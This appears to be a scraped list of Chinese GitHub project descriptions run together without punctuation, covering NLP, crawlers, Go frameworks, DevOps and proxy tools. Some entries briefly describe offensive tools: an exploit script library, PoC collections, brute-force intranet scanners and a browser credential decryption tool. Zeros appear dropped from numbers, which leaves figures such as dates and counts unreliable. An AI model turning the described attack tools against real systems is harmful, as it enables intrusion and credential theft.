w 网站使用 JPress 进行驱动 其中包括多个政府机构 2 上市公司 中科院 红 字会等 分布式事务易用的轻量化网络爬虫 Android系统源码分析重构中一款免费的数据可视化工具 报表与大屏设计 类似于excel操作风格 在线拖拽完成报表设计 功能涵盖 报表设计 图形报表 打印设计 大屏设计等 永久免费 秉承“简单 易用 专业”的产品理念 极大的降低报表开发难度 缩短开发周期 节省成本 解决各类报表难题 Android Activity 滑动返回 支持微信滑动返回样式 横屏滑动返回 全屏滑动返回SpringBoot 基础教程 从入门到上瘾 基于2 M5制作 仿微信视频拍摄UI 基于ffmpeg的视频录制编辑Python 1 天从新手到大师 分享 GitHub 上有趣 入门级的开源项目中英文敏感词 语言检测 中外手机 电话归属地 运营商查询 名字推断性别 手机号抽取 身份证抽取 邮箱抽取 中日文人名库 中文缩写库 拆字词典 词汇情感值 停用词 反动词表 暴恐词表 繁简体转换 英文模拟中文发音 汪峰歌词生成器 职业名称词库 同义词库 反义词库 否定词库 汽车品牌词库 汽车零件词库 连续英文切割 各种中文词向量 公司名字大全 古诗词库 IT词库 财经词库 成语词库 地名词库 历史名人词库 诗词词库 医学词库 饮食词库 法律词库 汽车词库 动物词库 中文聊天语料 中文谣言数据 百度中文问答数据集 句子相似度匹配算法集合 bert资源 文本生成 摘要相关工具 cocoNLP信息抽取 2 21年最新总结 阿里 腾讯 百度 美团 头条等技术面试题目 以及答案 专家出题人分析汇总 AiLearning 机器学习 MachineLearning ML 深度学习 DeepLearning DL 自然语言处理 NLP123 6智能刷票 订票结巴中文分词 动手学深度学习 面向中文读者 能运行 可讨论 中英文版被全球175所大学采用教学 中文分词 词性标注 命名实体识别 依存句法分析 语义依存分析 新词发现 关键词短语提取 自动摘要 文本分类聚类 拼音简繁转换 自然语言处理微信个人号接口 微信机器人及命令行微信 三十行即可自定义个人号机器人 数据结构和算法必知必会的5 个代码实现JumpServer 是全球首款开源的堡垒机 是符合 4A 的专业运维安全审计系统 飞桨 核心框架 深度学习 机器学习高性能单机 分布式训练和跨平台部署 中国程序员容易发音错误的单词微信 跳一跳 Python 辅助 python模拟登陆一些大型网站 还有一些简单的爬虫 希望对你们有所帮助 ️ 如果喜欢记得给个star哦 网络爬虫实战 淘宝 京东 网易云 B站 123 6 抖音 笔趣阁 漫画小说下载 音乐电影下载等Python爬虫代理IP池 proxy pool wtfpython的中文翻译 施工结束 能力有限 欢迎帮我改进翻译提供多款 Shadowrocket 规则 带广告过滤功能 用于 iOS 未越狱设备选择性地自动翻墙 123 6 购票助手 支持集群 多账号 多任务购票以及 Web 页面管理 walle 瓦力 Devops开源项目代码部署平台一些非常有趣的python爬虫例子 对新手比较友好 主要爬取淘宝 天猫 微信 豆瓣 QQ等网站机器学习相关教程1 Chinese Word Vectors 上百种预训练中文词向量 网易云音乐命令行版本一款入门级的人脸 视频 文字检测以及识别的项目 编程随想 整理的 太子党关系网络 专门揭露赵国的权贵微信助手 1 每日定时给好友 女友 发送定制消息 2 机器人自动回复好友 3 群助手功能 例如 查询垃圾分类 天气 日历 电影实时票房 快递物流 PM2 5等 二维码生成器 支持 gif 动态图片二维码 阿布量化交易系统 股票 期权 期货 比特币 机器学习 基于python的开源量化交易 量化投资架构 book 中华新华字典数据库 包括歇后语 成语 词语 汉字 Git AWS Google 镜像 SS SSR VMESS节点行业研究报告的知识储备库中文翻译手写实现李航 统计学习方法 书中全部算法 Python 抖音机器人 论如何在抖音上找到漂亮小姐姐? 迁移学习python爬虫教程系列 从 到1学习python爬虫 包括浏览器抓包 手机APP抓包 如 fiddler mitmproxy 各种爬虫涉及的模块的使用 如等 以及IP代理 验证码识别 Mysql MongoDB数据库的python使用 多线程多进程爬虫的使用 css 爬虫加密逆向破解 JS爬虫逆向 分布式爬虫 爬虫项目实战实例等Python脚本 模拟登录知乎 爬虫 操作excel 微信公众号 远程开机越来越多的网站具有反爬虫特性 有的用图片隐藏关键数据 有的使用反人类的验证码 建立反反爬虫的代码仓库 通过与不同特性的网站做斗争 无恶意 提高技术 欢迎提交难以采集的网站 因工作原因 项目暂停 人人影视bot 完全对接人人影视全部无删减资源莫烦Python 中文AI教学飞桨 官方模型库 包含多种学术前沿和工业场景验证的深度学习模型 轻量级人脸检测模型 百度云 百度网盘Python客户端 Python进阶 Intermediate Python 中文版 提供同花顺客户端 国金 华泰客户端 雪球的基金 股票自动程序化交易以及自动打新 支持跟踪 joinquant ricequant 模拟交易 和 实盘雪球组合 量化交易组件QUANTAXIS 支持任务调度 分布式部署的 股票 期货 期权 港股 虚拟货币 数据 回测 模拟 交易 可视化 多账户 纯本地量化解决方案INFO SPIDER 是一个集众多数据源于一身的爬虫工具箱 旨在安全快捷的帮助用户拿回自己的数据 工具代码开源 流程透明 支持数据源包括GitHub QQ邮箱 网易邮箱 阿里邮箱 新浪邮箱 Hotmail邮箱 Outlook邮箱 京东 淘宝 支付宝 中国移动 中国联通 中国电信 知乎 哔哩哔哩 网易云音乐 QQ好友 QQ群 生成朋友圈相册 浏览器浏览历史 123 6 博客园 CSDN博客 开源中国博客 简书 中文BERT wwm系列模型 Python入门网络爬虫之精华版中文 iOS Mac 开发博客列表Python网页微信APIpkuseg多领域中文分词工具自己动手做聊天机器人教程基于搜狗微信搜索的微信公众号爬虫接口用深度学习对对联 v2ray xray多用户管理部署程序各种脚本 关于 虾米 xiami com 百度网盘 pan baidu com 115网盘 115 com 网易音乐 music 163 com 百度音乐 music baidu com 36 网盘 云盘 yunpan cn 视频解析 flvxz com bt torrent ↔ magnet ed2k 搜索 tumblr 图片下载 unzip查看被删的微信好友定投改变命运 让时间陪你慢慢变富 onregularinvesting com 机器学习实战 Python3 kNN 决策树 贝叶斯 逻辑回归 SVM 线性回归 树回归Statistical learning methods 统计学习方法 第2版 李航 笔记 代码 notebook 参考文献 Errata lihang stock 股票系统 使用python进行开发 基于深度学习的中文语音识别系统京东抢购助手 包含登录 查询商品库存 价格 添加 清空购物车 抢购商品 下单 查询订单等功能莫烦Python 中文AI教学机器学习算法python实现新浪微博爬虫 用python爬取新浪微博数据的算法以及通用生成对抗网络图像生成的理论与实践研究 青岛大学开源 Online Judge QQ群 49671 125 admin qduoj comWeRoBot 是一个微信公众号开发框架 基于Django的博客系统 中文近义词 聊天机器人 智能问答工具包开源财经数据接口库巡风是一款适用于企业内网的漏洞快速应急 巡航扫描系统 番号大全 解决电脑 手机看电视直播的苦恼 收集各种直播源 电视直播网站知识图谱构建 自动问答 基于kg的自动问答 以疾病为中心的一定规模医药领域知识图谱 并以该知识图谱完成自动问答与分析服务 出处本地电影刮削与整理一体化解决方案自动化运维平台 CMDB CD DevOps 资产管理 任务编排 持续交付 系统监控 运维管理 配置管理 wukong robot 是一个简单 灵活 优雅的中文语音对话机器人 智能音箱项目 还可能是首个支持脑机交互的开源智能音箱项目 获取斗鱼 虎牙 哔哩哔哩 抖音 快手等 55 个直播平台的真实流媒体地址 直播源 和弹幕 直播源可在 PotPlayer flv js 等播放器中播放 宝塔Linux面板 简单好用的服务器运维面板农业知识图谱 AgriKG 农业领域的信息检索 命名实体识别 关系抽取 智能问答 辅助决策CODO是一款为用户提供企业多混合云 一站式DevOps 自动化运维 完全开源的云管理平台 自动化运维平台Web Pentesting Fuzz 字典 一个就够了 计算机网络 自顶向下方法 原书第6版 编程作业 Wireshark实验文档的翻译和解答 中文古诗自动作诗机器人 屌炸天 基于tensorflow1 1 api 正在积极维护升级中 快star 保持更新 PyQt Examples PyQt各种测试和例子 PyQt4 PyQt5海量中文预训练ALBERT模型汉字转拼音 pypinyin 数据结构与算法 leetcode lintcode题解 Pytorch模型训练实用教程 中配套代码实时获取新浪 腾讯 的免费股票行情 集思路的分级基金行情Python爬虫 Flask网站 免费ShadowSocks账号 ssr订阅 json 订阅实战 多种网站 电商数据爬虫 包含 淘宝商品 微信公众号 大众点评 企查查 招聘网站 闲鱼 阿里任务 博客园 微博 百度贴吧 豆瓣电影 包图网 全景网 豆瓣音乐 某省药监局 搜狐新闻 机器学习文本采集 fofa资产采集 汽车之家 国家统计局 百度关键词收录数 蜘蛛泛目录 今日头条 豆瓣影评 携程 小米应用商店 安居客 途家民宿 ️ ️ ️ 微信爬虫展示项目 SQL 审核查询平台团子翻译器 个人兴趣制作的一款基于OCR技术的翻译器自动化运维平台 代码及应用部署CI CD 资产管理CMDB 计划任务管理平台 SQL审核 回滚 任务调度 站内WIKISource Code Security Audit 源代码安全审计 Exphub 漏洞利用脚本库 包括的漏洞利用脚本 最新添加我的自学笔记 终身更新 当前专注System基础 MLSys 使用机器学习算法完成对123 6验证码的自动识别Python 开源项目之 自学编程之路 保姆级教程 AI实验室 宝藏视频 数据结构 学习指南 机器学习实战 深度学习实战 网络爬虫 大厂面经 程序人生 资源分享 中文文本分类基于pytorch 开箱即用 根据网易云音乐的歌单 下载flac无损音乐到本地腾讯优图高精度双分支人脸检测器文本纠错等模型实现 开箱即用 3 天掌握量化交易 持续更新 中文分词 词性标注 命名实体识别 依存句法分析 新词发现 关键词短语提取 自动摘要 文本分类聚类 拼音简繁 自然语言处理中文公开聊天语料库豆瓣读书的爬虫总结梳理自然语言处理工程师 NLP 需要积累的各方面知识 包括面试题 各种基础知识 工程能力等等 提升核心竞争力中文自然语言处理数据集 平时做做实验的材料 欢迎补充提交合并 一个可以自己进行训练的中文聊天机器人 根据自己的语料训练出自己想要的聊天机器人 可以用于智能客服 在线问答 智能聊天等场景 目前包含seq2seq seqGAN版本 tf2 版本 pytorch版本 股票量化框架 支持行情获取以及交易微博爬虫 持续维护 Bilibili 用户爬虫 deepin源移植 Debian Ubuntu上最快的QQ 微信安装方式 新闻网页正文通用抽取器 Beta 版 flag on post 自动更新域名解析到本机IP 支持dnspod 阿里DNS CloudFlare 华为云 DNSCOM 本项目针对字符型图片验证码 使用tensorflow实现卷积神经网络 进行验证码识别 owllook 小说搜索引擎中文语言理解测评基准python中文库 python人工智能大数据自动化接口测试开发 书籍下载及python库汇总china testing github io 2 19新型冠状病毒疫情时间序列数据仓库Python 黑魔法手册单阶段通用目标检测器一个拍照做题程序 输入一张包含数学计算题的图片 输出识别出的数学计算式以及计算结果 video download B站视频下载中文命名实体识别 TensorFlow Python 中文数据结构和算法教程 验证码识别 训练Python爬虫实战 模拟登陆各大网站 包含但不限于 滑块验证 拼多多 美团 百度 bilibili 大众点评 淘宝 如果喜欢请start ️学无止下载器 慕课下载器 Mooc下载 慕课网下载 中国大学下载 爱课程下载 网易云课堂下载 学堂在线下载 超星学习通下载 支持视频 课件同时下载一个高级web目录 文件扫描工具 功能将会强于DirBuster Dirsearch cansina 御剑 搜索所有中文NLP数据集 附常用英文NLP数据集中文实体识别与关系提取2 19新型冠状病毒疫情实时爬虫及github release archive以及项目文件的加速项目安卓应用安全学习抓取大量免费代理 ip 提取有效 ip 使用RoBERTa中文预训练模型 RoBERTa for Chinese 用于训练中英文对话系统的语料库敏感词过滤的几种实现 某1w词敏感词库简单易用的Python爬虫框架 QQ交流群 59751 56 使用Bert ERNIE 进行中文文本分类为 CSAPP 视频课程提供字幕 翻译 PPT Lab PyTorch 官方中文教程包含 6 分钟快速入门教程 强化教程 计算机视觉 自然语言处理 生成对抗网络 强化学习 欢迎 Star Fork 兜哥出品 <一本开源的NLP入门书籍 图像翻译 条件GAN AI绘画用Resnet1 1 GPT搭建一个玩王者荣耀的AI各种漏洞poc Exp的收集或编写斗地主AIVulmap 是一款 web 漏洞扫描和验证工具 可对 webapps 进行漏洞扫描 并且具备漏洞验证功能提供超過 5 個金融資料 台股為主 每天更新 finmind github io 数据接口 百度 谷歌 头条 微博指数 宏观数据 利率数据 货币汇率 千里马 独角兽公司 新闻联播文字稿 影视票房数据 高校名单 疫情数据 PyOne 一款给力的onedrive文件管理 分享程序 使用开发的用于迅速搭建并使用 WebHook 进行自动化部署和运维 支持 Github GitLab Gogs GitOsc 跟我一起写Makefile重制版 python自动化运维 技术与最佳实践 书中示例及案例源码自然语言处理实验 sougou数据集 TF IDF 文本分类 聚类 词向量 情感识别 关系抽取等微信公众平台 Python 开发包 DEPRECATED Weblogic一键漏洞检测工具 V1 5 更新时间 2 2 73 完备优雅的微信公众号接口 原生支持同步 协程使用 本程序旨在为安全应急响应人员对Linux主机排查时提供便利 实现主机侧Checklist的自动全面化检测 根据检测结果自动数据聚合 进行黑客攻击路径溯源 PyCharm 中文指南 安装 破解 效率 技巧类似按键精灵的鼠标键盘录制和自动化操作 模拟点击和键入GPT2 for Chinese chitchat 用于中文闲聊的GPT2模型 实现了DialoGPT的MMI思想 中华人民共和国国家标准 GB T 226 行政区划代码基于python的量化交易平台中文语音识别基于 OneBot 标准的 Python 异步 QQ 机器人框架Real World Masked Face Dataset 口罩人脸数据集 Vulfocus 是一个漏洞集成平台 将漏洞环境 docker 镜像 放入即可使用 开箱即用 谷歌 百度 必应图片下载 基于方面的情感分析 使用PyTorch实现 深度学习与计算机视觉 配套代码ART环境下自动化脱壳方案利用网络上公开的数据构建一个小型的证券知识图谱 知识库中文资源精选 官方网站 安装教程 入门教程 视频教程 实战项目 学习路径 QQ群 167122861 公众号 磐创AI 微信群二维码 www tensorflownews com Pre Trained Chinese XLNet 中文XLNet预训练模型 新浪微博Python SDK有关burpsuite的插件 非商店 文章以及使用技巧的收集 此项目不再提供burpsuite破解文件 如需要请在博客mrxn net下载Python3编写的CMS漏洞检测框架基于django的工作流引擎 工单 ️ 哔哩云 不支持任意文件的全速上传与下载微信SDK 包括微信支付 微信公众号 微信登陆 微信消息处理等中文自然语言理解堡垒机 云桌面自动化运维 审计 录像 文件管理 sftp上传 实时监控 录像回放 网页版rz sz上传下载 动态口令 django转换中国知网 CAJ 格式文献为 PDF 佛系转换 成功与否 皆是玄学 HanLP作者的新书 自然语言处理入门 详细笔记 业界良心之作 书中不是枯燥无味的公式罗列 而是用白话阐述的通俗易懂的算法模型 从基本概念出发 逐步介绍中文分词 词性标注 命名实体识别 信息抽取 文本聚类 文本分类 句法分析这几个热门问题的算法原理与工程实现 Python3 网络爬虫实战 部分含详细教程 猫眼 腾讯视频 豆瓣 研招网 微博 笔趣阁小说 百度热点 B站 CSDN 网易云阅读 阿里文学 百度股票 今日头条 微信公众号 网易云音乐 拉勾 有道 unsplash 实习僧 汽车之家 英雄联盟盒子 大众点评 链家 LPL赛程 台风 梦幻西游 阴阳师藏宝阁 天气 牛客网 百度文库 睡前故事 知乎 Wish微信公众号文章的爬虫 Python Web开发实战 书中源码一直可用的GoAgent 会定时扫描可用的google gae ip 提供可自动化获取ip运行的版本层剪枝 通道剪枝 知识蒸馏 中文命名实体识别 包括多种模型 HMM CRF BiLSTM BiLSTM CRF的具体实现 The Way to Go 中文译本 中文正式名 Go 入门指南 谢谢 Solutions to LeetCode by Go 1 % test coverage runtime beats 1 % LeetCode 题解一款轻量级 高性能 功能强大的内网穿透代理服务器 支持tcp udp socks5 http等几乎所有流量转发 可用来访问内网网站 本地支付接口调试 ssh访问 远程桌面 内网dns解析 内网socks5代理等等 并带有功能强大的web管理端 Go语言高级编程 开源图书 涵盖CGO Go汇编语言 RPC实现 Protobuf插件实现 Web框架实现 分布式系统等高阶主题 完稿 是一个跨平台的强加密无特征的代理软件 零配置 算法模板 最科学的刷题方式 最快速的刷题路径 你值得拥有 百度网盘不限速客户端 golang qt5 跨平台图形界面是golang实现的高性能http https websocket tcp socks5代理服务器 支持内网穿透 链式代理 通讯加密 夜读 通过 bilibili 在线直播的方式分享 Go 相关的技术话题 每天大家在微信 telegram Slack 上及时沟通交流编程技术话题 支持多家云存储的云盘系统 这里是写博客的地方 Halfrost Field 冰霜之地Lantern官方版本下载 蓝灯 翻墙 代理 科学上网 外网 加速器 梯子 路由基于gin vue搭建的后台管理系统框架 集成jwt鉴权 权限管理 动态路由 分页封装 多点登录拦截 资源权限 上传下载 代码生成器 表单生成器 通用工作流等基础功能 五分钟一套CURD前后端代码 目VUE3版本正在重构 欢迎issue和pr 分布式爬虫管理平台 支持任何语言和框架Golang标准库 对于程序员而言 标准库与语言本身同样重要 它好比一个百宝箱 能为各种常见的任务提供完美的解决方案 以示例驱动的方式讲解Golang的标准库 天用Go动手写 从零实现系列是一个高性能且低损耗的 goroutine 池 有 有 设计模式 Golang实现 研磨设计模式 读书笔记Golang实现的基于beego框架的接口在线文档管理系统高性能开源RTSP流媒体服务器 基于go语言研发 维护和优化 RTSP推模式转发 RTSP拉模式转发 是一个高性能 轻量级 非阻塞的事件驱动 Go 网络框架 基于Gin Vue Element UI的前后端分离权限管理系统脚手架 包含了 多租户的支持 基础用户管理功能 jwt鉴权 代码生成器 RBAC资源控制 表单构建 定时任务等 3分钟构建自己的中后台项目 文档蓝鲸智云配置平台 BlueKing CMDB 今日热榜 一个获取各大热门网站热门头条的聚合网站 使用Go语言编写 多协程异步快速抓取信息 预览 mo fish一条命令离线安装高可用kubernetes 3min装完 7 M 1 年证书 生产环境稳如老狗阿里巴巴开源的一款简单易用 功能强大的混沌实验注入工具 Go语言四十二章经 详细讲述Go语言规范与语法细节及开发中常见的误区 通过研读标准库等经典代码设计模式 启发读者深刻理解Go语言的核心思维 进入Go语言开发的更高阶段 ️一个轻巧的网络混淆代理 基于Golang轻量级TCP并发服务器框架定时任务管理系统KubeOperator 是一个开源的轻量级 Kubernetes 发行版 专注于帮助企业规划 部署和运营生产级别的 K8s 集群 本系统是集工单统计 任务钩子 权限管理 灵活配置流程与模版等等于一身的开源工单系统 当然也可以称之为工作流引擎 致力于减少跨部门之间的沟通 自动任务的执行 提升工作效率与工作质量 减少不必要的工作量与人为出错率 Go实现的Trojan代理 支持多路复用 路由功能 CDN中转 Shadowsocks混淆插件 多平台 无依赖 Go语法树入门 开启自制编程语言和编译器之旅 开源免费图书 Go语言进阶 掌握抽象语法树 Go语言AST 凹语言 一款可全平台运行的浏览器数据导出解密工具 Golang相关 审稿进度8 % Go语法 Go并发思想 Go与web开发 Go微服务设施等Jupiter是斗鱼开源的面向服务治理的Golang微服务框架Elasticsearch 可视化DashBoard 支持Es监控 实时搜索 Index template快捷替换修改 索引列表信息查看 SQL converts to DSL等 从问题切入 串连 Go 语言相关的所有知识 融会贯通 golang design go questionsWeChat SDK for Go 微信SDK 简单 易用 go fastdfs 是一个简单的分布式文件系统 私有云存储 具有无中心 高性能 高可靠 免维护等优点 支持断点续传 分块上传 小文件合并 自动同步 自动修复 Mastering GO 中文译本 玩转 GO 云原生且易用的应用管理平台 Go Web 基础 是一套针对 Google 出品的 Go 语言的视频语音教程 主要面向完成 Go 编程基础 教程后希望进一步了解有关 Go Web 开发的学习者 中文名 悟空 API 网关 是一个基于 Golang开发的微服务网关 能够实现高性能 HTTP API 转发 服务编排 多租户管理 API 访问权限控制等目的 拥有强大的自定义插件系统可以自行扩展 并且提供友好的图形化配置界面 能够快速帮助企业进行 API 服务治理 提高 API 服务的稳定性和安全性 集合多家 API 的新一代图床MIT课程 Distributed Systems 学习和翻译Go语言圣经中文版 只接收PR Issue请提交到golang china gopl zh trojan多用户管理部署程序 支持web页面管理BookStack 基于MinDoc 使用Beego开发的在线文档管理系统 功能类似Gitbook和看云 weixin wechat 微信公众平台 微信企业号 微信商户平台 微信支付 go golang sdk 蓝眼云盘 Eyeblue Cloud Storage 语言高性能编程 Go 语言陷阱 Gotchas Traps 使用 XMind 记录 Linux 操作系统 网络 C Golang 以及数据库的一些设计cqhttp的golang实现 轻量 原生跨平台 mqant是一款基于Golang语言的简洁 高效 高性能的分布式微服务框架基于react node js go开发的微商城 含微信小程序 MM Wiki 一个轻量级的企业知识分享与团队协同软件 可用于快速构建企业 Wiki 和团队知识分享平台 部署方便 使用简单 帮助团队构建一个信息共享 文档管理的协作环境 Go 语言中文网 Golang中文社区 Go语言学习园地 源码基于 Gin 进行模块化设计的 API 框架 封装了常用功能 使用简单 致力于进行快速的业务研发 比如 支持 cors 跨域 jwt 签名验证 zap 日志收集 panic 异常捕获 trace 链路追踪 prometheus 监控指标 swagger 文档生成 viper 配置文件解析 gorm 数据库组件 gormgen 代码生成工具 graphql 查询语言 errno 统一定义错误码 gRPC 的使用 等等 syncd是一款开源的代码部署工具 它具有简单 高效 易用等特点 可以提高团队的工作效率 一款由 YSRC 开源的主机入侵检测系统golang面试题集合这是一个可以识别视频语音自动生成字幕SRT文件的开源 Windows GUI 软件工具 一款内网综合扫描工具 方便一键自动化 全方位漏扫扫描 是一个用于在两个redis之间同步数据的工具 满足用户非常灵活的同步 迁移需求 Overlord是哔哩哔哩基于Go语言编写的memcache和redis cluster的代理及集群管理功能 致力于提供自动化高可用的缓存服务解决方案 Stack RPC 中文示例 教程 资料 源码解读ICMP流量伪装转发工具Freedom是一个基于六边形架构的框架 可以支撑充血的领域模型范式 Go2编程指南 开源图书 重点讲解Go2新特性 以及Go1教程中较少涉及的特性语言高性能分词golang写的IM服务器 服务组件形式 结巴 中文分词的Golang版本xorm是一个简单而强大的Go语言ORM库 通过它可以使数据库操作非常简便 本库是基于原版xorm的定制增强版本 为xorm提供类似ibatis的配置文件及动态SQL支持 支持AcitveRecord操作一个 Go 语言实现的快速 稳定 内嵌的 k v 数据库 高性能表格数据导出器基于Golang的开源社区系统 版本网易云音乐ncm文件格式转换 go 实现的压测工具 ab locust Jmeter压测工具介绍 单台机器1 w连接压测实战 抓包截取项目中的数据库请求并解析成相应的语句 Go专家编程 Go语言快速入门 轻松进阶 <<自己动手写docker 源码Go 每日一库kunpeng是一个Golang编写的开源POC框架 库 以动态链接库的形式提供各种语言调用 通过此项目可快速开发漏洞检测类的系统 vue js element框架 golang beego框架 开发的运维发布系统 支持git jenkins版本发布 go ssh BT两种文件传输方式选择 支持部署前准备任务和部署后任务钩子函数 Go 从入门到实战 学习笔记 从零开始学 Go Gin 框架 基本语法包括 26 个Demo Gin 框架包括 Gin 自定义路由配置 Gin 使用 Logrus 进行日志记录 Gin 数据绑定和验证 Gin 自定义错误处理 Go gRPC Hello World 持续更新中 Go 学习之路 Go 开发者博客 Go 微信公众号 Go 学习资料 文档 书籍 视频 微信 WeChat 支付宝 AliPay 的Go版本SDK 极简 易用的聚合支付SDK Go by Example 通过例子学 GolangPPGo Job是一款可视化的 多人多权限的 一任务多机执行的定时任务管理系统 采用golang开发 安装方便 资源消耗少 支持大并发 可同时管理多台服务器上的定时任务 Golang实现的IP代理池是一款用Go语言开发的web应用框架 API特性类似于Tornado并且拥有比Tornado更好的性能 自己动手写Java虚拟机 随书源代码支付宝 AliPay SDK for Go 集成简单 功能完善 持续更新 支持公钥证书和普通公钥进行签名和验签 ARCHIVED Geph 迷霧通帮助你将本地端口暴露在外网 支持TCP UDP 当然也支持HTTP 深入Go并发编程研讨课无状态子域名爆破工具手机号码归属地信息库 手机号归属地查询 phone dat 最后更新 2 21年 6月 golang基于websocket单台机器支持百万连接分布式聊天 IM 系统基于mongodb oplog的集群复制工具 可以满足迁移和同步的需求 进一步实现灾备和多活功能 Gin Gorm开发Golang API快速开发脚手架简单可信赖的任务管理工具Go语言实例教程从入门到进阶 包括基础库使用 设计模式 面试易错点 工具类 对接第三方等授权框架简体中文翻译 自动抓取tg频道 订阅地址 公开互联网上的ss ssr vmess trojan节点信息 聚合去重后提供节点列表轻量级 go 业务框架 哪吒监控 一站式轻监控轻运维系统 支持系统状态 TCP Ping 监控报警 命令批量执行和计划任务 Go 语言官方教程中文版工程师知识管理系统 基于golang go语言 beego框架 每个行业都有自己的知识管理系统 engineercms旨在为土木工程师们打造一款适用的基于web的知识管理系统 它既可以用于管理个人的项目资料 也可以用于管理项目团队资料 它既可以运行于个人电脑 也可以放到服务器上 支持提取码分享文件 onlyoffice实时文档协作 直接在线编辑dwg文件 office文档 在线利用mindoc创作你的书籍 阅览PDF文件 通用的业务流程设置 手机端配套小程序 微信搜索“珠三角设代”或“青少儿书画”即可呼出小程序 边界打点后的自动化渗透工具一个集审核 执行 备份及生成回滚语句于一身的MySQL运维工具汉字转拼音 Go资源精选中文版 含中文图书大全 语言实现的 Redis 服务器和分布式集群 超全golang面试题合集 golang学习指南 golang知识图谱 入门成长路线 一份涵盖大部分golang程序员所需要掌握的核心知识 常用第三方库 mysql mq es redis等 机器学习库 算法库 游戏库 开源框架 自然语言处理nlp库 网络库 视频库 微服务框架 视频教程 音频音乐库 图形图片库 物联网库 地理位置信息 嵌入式脚本库 编译器库 数据库 金融库 电子邮件库 电子书籍 分词 数据结构 设计模式 去html tag标签等 go学习 go面试go语言扩展包 收集一些常用的操作函数 辅助更快的完成开发工作 并减少重复代码百灵快传 基于Go语言的高性能 手机电脑超大文件传输神器 局域网共享文件服务器 LAN large file transfer tool 一个基于云存储的网盘系统 用于自建私人网盘或企业网盘 go分布式服务器 基于内存mmo个人博客微信小程序服务端 SDK for Golang 控制台颜色渲染工具库 支持16色 256色 RGB色彩渲染输出 使用类似于 Print Sprintf 兼容并支持 Windows 环境的色彩渲染基于 IoC 的 Go 后端一站式开发框架 v2ray web manager 是一个v2ray的面板 也是一个集群的解决方案 同时增加了流量控制 账号管理 限速等功能 key admin panel web cluster 集群 proxyServerScan一款使用Golang开发的高并发网络扫描 服务探测工具 是http client领域的瑞士军刀 小巧 强大 犀利 具体用法可看文档 如使用迷惑或者API用得不爽都可提issuesTcpRoute TCP 层的路由器 对于 TCP 连接自动从多个线路 电信 联通 移动 多个域名解析结果中选择最优线路 Bifrost 面向生产环境的 MySQL 同步到Redis MongoDB ClickHouse MySQL等服务的异构中间件应用网关 提供快速 安全的应用交付 身份认证 WAF CC HTTPS以及ACME自动证书 A telegram bot for rss reader 一个支持应用内阅读的 Telegram RSS Bot RESTful API 文档生成工具 支持和 Ruby 等大部分语言 基于gin gorm开发的个人博客项目基于Go语言的国密SM2 SM3 SM4算法库 Golang 设计模式一个阿里云盘列表程序 一款小巧的基于Go构建的开发框架 可以快速构建API服务或者Web网站进行业务开发 遵循SOLID设计原则并发编程实战 第2版 Go 学习 Go 进阶 Go 实用工具类 Go kit Go Micro 微服务实践 Go 推送基于DDD的o2o的业务模型及基础 使用Golang gRPC Thrift实现Sharingan 写轮眼 是一个基于golang的流量录制回放工具 适合项目重构 回归测试等 百度云网盘爬虫基于beego的进销存系统 TeaWeb 可视化的Web代理服务 DEMO teaos cn 白帽子安全开发实战 配套代码抖音推荐 搜索页视频列表视频爬虫方案 基于app 虚拟机或真机 相关技术 golang adb一款甲方资产巡航扫描系统 系统定位是发现资产 进行端口爆破 帮助企业更快发现弱口令问题 主要功能包括 资产探测 端口爆破 定时任务 管理后台识别 报表展示提供微信终端版本 微信命令行版本聊天功能 微信机器人 ️ 互联网最全大厂技术分享PPT 持续更新中 各大技术交流会 活动资料汇总 如 QCon 全球运维技术大会 GDG 全球技术领导力峰会 大前端大会 架构师峰会 敏捷开发DevOps OpenResty Elastic 欢迎 PR Issues日本麻将助手 牌效 防守 记牌 支持雀魂 天凤 开源客服系统GO语言开发GO FLY 免费客服系统一个查询IP地理信息和CDN服务提供商的离线终端工具 是一个用于系统重构 系统迁移和系统分析的瑞士军刀 它可以分析代码中的测试坏味道 模块化分析 行数统计 分析调用与依赖 Git 分析以及自动化重构等 一个直播录制工具Mastering Go 第二版中文版来袭 渗透测试情报收集工具分布式定时任务调度平台高度模块化 遵循 KISS原则的区块链开发框架golang版本的hangout 希望能省些内存 使用了自己写的Kafka lib 虚 不过我们在生产环境已经使用近1年 kafka 版本从 9 1到2 都在使用 目前情况稳定 吞吐量在每天2 亿条以上 Go 语言 Web 应用开发系列教程 从新手到双手残废iris 框架的后台api项目简单好用的DDNS 自动更新域名解析到公网IP 支持阿里云 腾讯云dnspod Cloudflare 华为云 自己动手实现Lua 随书源代码php直播go直播 短视频 直播带货 仿比心 猎游 tt语音聊天 美女约玩 陪玩系统源码开黑 约玩源码 社区开源 云原生的多云和混合云融合平台 Jiajun的编程随想Golang语言社区 腾讯课堂 网易云课堂 字节教育课程PPT及代码基于GF Go Frame 的后台管理系统带你了解一下Golang的市场行情mysql表结构自动同步工具 目前只支持字段 索引的同步 分区等高级功能暂不支持 基于Kubernetes的PaaS平台流媒体NetFlix解锁检测脚本稳定分支2 9 X 版本已更新 由 Golang语言游戏服务器 维护 全球服游戏服务器及区域服框架 目前协议支持websocket KCP TCP及RPC 采用状态同步 帧同步内测 愿景 打造MMO多人竞技游戏框架 功能持续更新中 基于 Golang 类似知乎的私有部署问答应用 包含问答 评论 点赞 管理后台等功能全新的开源漏洞测试框架 实现poc在线编辑 运行 批量测试 使用文档 XAPI MANAGER 专业实用的开源接口管理平台 为程序开发者提供一个灵活 方便 快捷的API管理工具 让API管理变的更加清晰 明朗 如果你觉得xApi对你有用的话 别忘了给我们点个赞哦 qq协议的golang实现 移植于miraigo版本极简工作流引擎全平台Go开源内网渗透扫描器框架 Windows Linux Mac内网渗透 使用它可轻松一键批量探测C段 B段 A段存活主机 高危漏洞检测MS17 1 SmbGhost 远程执行SSH Winrm 密码爆破端口扫描服务识别PortScan指纹识别多网卡主机 端口扫描服务识别PortScan iikira BaiduPCS Go原版基础上集成了分享链接 秒传链接转存功能 e签宝安全团队积累十几年的安全经验 都将对外逐步开放 首开的Ehoney欺骗防御系统 该系统是基于云原生的欺骗防御系统 也是业界唯一开源的对标商业系统的产品 欺骗防御系统通过部署高交互高仿真蜜罐及流量代理转发 再结合自研密签及诱饵 将攻击者攻击引导到蜜罐中达到扰乱引导以及延迟攻击的效果 可以很大程度上保护业务的安全 护网必备良药漂亮的Go语言通用后台管理框架 包含计划任务 MySQL管理 Redis管理 FTP管理 SSH管理 服务器管理 Caddy配置 云存储管理等功能 微信支付 WeChat Pay SDK for Golang用于监控系统的日志采集agent 可无缝对接open falcon阿里巴巴mysql数据库binlog的增量订阅 消费组件 Canal 的 go 客户端 github com alibaba canal 用于比较2个redis数据是否一致 支持单节点 主从 